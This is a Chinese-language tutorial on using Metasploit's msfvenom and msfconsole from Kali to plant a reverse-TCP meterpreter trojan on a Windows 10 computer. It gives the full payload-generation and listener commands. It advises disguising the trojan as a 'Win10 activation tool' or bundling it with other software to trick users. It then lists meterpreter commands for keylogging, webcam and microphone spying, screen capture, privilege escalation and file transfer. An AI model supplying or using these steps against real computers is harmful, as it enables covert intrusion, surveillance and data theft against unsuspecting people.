Kali利用msf入侵Windows電腦(最詳細包會)
Kali利用msfvenom入侵Windows電腦
一、什麼是msf
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用來生成後門的軟體。
MSFvenom是Msfpayload和Msfencode的組合,將這兩個工具都放在一個Framework例項中。自2015年6月8日起,msfvenom替換了msfpayload和msfencode。
演示環境
使用Kali 2021.3進行演示操作
目標靶機: Win10專業版
軟體:msfvenom、msfconsole(Kali系統內建)
二、滲透流程
1.進入管理員模式
命令: sudo su
解釋: 不在管理員模式下執行可能會有許可權不夠的提示,為了避免命令執行失敗,在管理員下執行以下命令
提示:執行命令之後輸入Kali的密碼,密碼是被隱藏的,直接輸入然後回車即可
2.生成可執行木馬檔案
命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地埠號> –f exe –o <檔名>
解釋: 本地ip寫自己Kali的IP地址,用ifconfig就能檢視自己Kali的IP地址
本地埠自己隨便設定一個沒有被佔用的埠號,如果埠號被佔用那麼檔案會生成失敗,換一個埠號就性
檔名可以隨便寫自己喜歡的名字,比如寫Win10啟用工具,可能更容易讓目標主機上鉤
當然MSF也可以用來入侵手機、mac、Linux等
這個就是Kali主機的IP地址
接下來執行命令生成木馬
預設生成的檔案在根目錄下
把剛才生成的檔案放到目標靶機Win10系統中
3.執行msfconsole命令
命令: msfconsole
4.配置引數
(1)命令: use exploit/multi/handler(選擇模組)
(2)命令:
set payload windows/meterpreter/reverse_tcp(選擇攻擊模組)(3)命令:
set LhOST 192.168.32.1(填寫自己主機的IP地址)(4)命令:
set lport 1111(填寫剛才生成檔案時的埠號)(5)命令:
show options(檢視設定引數)(6)命令:
exploit -z -j(後臺執行)
引數設定好之後在靶機開啟程式然後執行步驟6的命令,也可以直接輸入命令
exploit開始攻擊
5.在靶機開啟可執行檔案
我們這裡也可以把這個程式偽裝一下,把他的圖示改一下,或者把它捆綁在某些軟體上面,當用戶開啟就自動安裝到對方電腦上面
6.檢視使用者
(1)命令: sessions(檢視上鉤的使用者)
(2)命令: sessions -i 1(選擇需要攻擊的使用者,這裡選擇第 1 個)
出現
meterpreter你就已經成功的入侵的對方的電腦
三、meterpreter入侵對方電腦的命令
1.監控對方電腦螢幕
命令: run vnc -i
2.更多命令
還可以檢視幫助文件,命令
help
cmd指令:
cat 讀取檔案內容到螢幕
cd 更改目錄
checksum 檢索檔案的校驗和
cp 將源複製到目標
del 刪除指定檔案
dir 列出檔案(ls 的別名)
下載 下載檔案或目錄
編輯 編輯檔案
getlwd 列印本地工作目錄
getwd 列印工作目錄
lcd 更改本地工作目錄
lls 列出本地檔案
lpwd 列印本地工作目錄
ls 列出檔案
mkdir 建立目錄
mv 將源移動到目標
pwd 列印工作目錄
rm 刪除指定檔案
rmdir 刪除目錄
search 搜尋檔案
show_mount 列出所有掛載點/邏輯驅動器
upload 上傳檔案或目錄
pkill 按名稱終止程序
meterpreter命令:
keyscan_start 開始捕獲擊鍵(開始鍵盤記錄)
keyscan_dump 轉儲按鍵緩衝(下載鍵盤記錄)
keyscan_stop 停止捕獲擊鍵(停止鍵盤記錄)
record_mic X秒從預設的麥克風record_mic音訊記錄(音訊錄製)
webcam_chat 開始視訊聊天(視訊,對方會有彈窗)
webcam_list 單攝像頭(檢視攝像頭列表)
webcam_snap 採取快照從指定的攝像頭(攝像頭拍攝一張照片)
webcam_stream 播放視訊流從指定的攝像頭(開啟攝像頭監控)
enumdesktops 列出所有可訪問的桌面和視窗站(窗體列表)
getdesktop 得到當前的Meterpreter桌面
reboot 重新啟動遠端計算機
shutdown 關閉遠端計算機
shell 放入系統命令 shell
enumdesktops 列出所有可訪問的桌面和視窗站
getdesktop 獲取當前的meterpreter桌面
idletime 返回遠端使用者空閒的秒數
keyboard_send 傳送擊鍵
keyevent 傳送按鍵事件
keyscan_dump 轉儲擊鍵緩衝區
keyscan_start 開始捕獲擊鍵
keyscan_stop 停止捕獲擊鍵
mouse 傳送滑鼠事件
screenshare 實時觀看遠端使用者桌面
screenshot 抓取互動式桌面的螢幕截圖
setdesktop 更改 Meterpreters 當前桌面
uictl 控制一些使用者介面元件
record_mic 從預設麥克風錄製音訊 X 秒
webcam_chat 開始視訊聊天
webcam_list 列出網路攝像頭
webcam_snap 從指定的網路攝像頭拍攝快照
webcam_stream 播放來自指定網路攝像頭的視訊流
play 在目標系統上播放波形音訊檔案 (.wav)
getsystem 嘗試將您的許可權提升到本地系統的許可權
execute -f notepad 開啟記事本
把檔案上傳到靶機命令
把檔案下載到主機命令